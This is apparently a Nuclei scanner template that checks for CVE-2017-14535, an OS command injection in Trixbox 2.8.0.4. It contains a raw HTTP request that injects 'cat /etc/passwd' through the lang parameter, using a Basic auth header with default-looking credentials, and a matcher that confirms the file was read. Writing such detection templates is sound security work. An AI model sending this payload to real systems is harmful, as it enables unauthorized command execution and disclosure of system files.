nuclei-templates/cves/2017/CVE-2017-14535.yaml

42 lines
1.2 KiB
YAML

id: CVE-2017-14535
info:
name: Trixbox - 2.8.0.4 OS Command Injection
author: pikpikcu
severity: high
description: "Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
- https://nvd.nist.gov/vuln/detail/CVE-2017-14535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-14535
cwe-id: CWE-78
tags: cve,cve2017,trixbox,rce,injection
requests:
- raw:
- |
GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: close
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/04/01